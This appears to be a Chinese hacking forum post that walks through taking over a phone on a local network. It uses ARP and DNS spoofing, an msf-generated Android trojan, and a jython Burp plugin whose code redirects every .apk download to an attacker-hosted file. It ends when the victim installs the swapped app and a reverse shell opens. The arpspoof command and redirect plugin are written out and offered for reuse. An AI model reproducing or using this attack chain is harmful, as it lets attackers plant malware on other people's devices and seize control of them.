Moke|墨客

 找回密码
 立即注册
搜索
查看: 10359|回复: 0

内网渗透之手机控制

[复制链接]

3636

主题

0

回帖

3681

积分

超级版主

Rank: 8Rank: 8

积分
3681
发表于 2016-5-9 14:34:50 | 显示全部楼层 |阅读模式



                                                    从wifi破解到pc及手机控制,给大家分享个手机下载apk替换的方法





(一)环境:



目标机:192.168.247.130
渗透机kali:192.168.247.129
网关:192.168.247.2





(二)用到的工具:



1.arpspoof
2.dnsspoof
3.burp
4.jython-burp-api (kali里没有集成,需要另外安装,详细请参见:https://github.com/mwielgoszewski/jython-burp-api)





(三)步骤:



1.使用arpspoof来发送arp欺骗包;


  • arpspoof -i eth0 -t 192.168.247.130 192.168.247.2
2.使用dnsspoof进行dns欺骗;        

3.使用msf来生成一个安卓木马;  

4.msf进行监听,等待木马反弹连接;  

5.编写python脚本,用于apk下载重定向,代码如下,注意:将这段代码保存到jython-burp-api下的Lib目标下,并命名为testplugin.py;

  • from gds.burp.api import IProxyRequestHandler

  • from gds.burp.core import Component, implements

  • class ExamplePlugin(Component):

  • implements(IProxyRequestHandler)

  • def processRequest(self, request):

  • if ".apk" in request.url.geturl():

  • print "apk download detected, redirecting"

  • request.host = "192.168.4.84"

  • request.raw = ("GET /1.apk HTTP/1.1\r\n" +

  • "HOST: 192.168.4.84\r\n\r\n")


6.编辑jython-burp-api中的burp.ini配置文件;         


7.启动burp,命令:java -Xmx1g -jar burpsutie.jar
8.对burp进行设置        




9.在burp里加载jython  


10.当目标开始下载apk的时候,就会替换为我们指定的apk进行下载      


11.这时burp中的jython控制台如下:
                     

12.当目标安装并运行下载的apk后msf成功收到反弹;      

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

 

 

快速回复 返回顶部 返回列表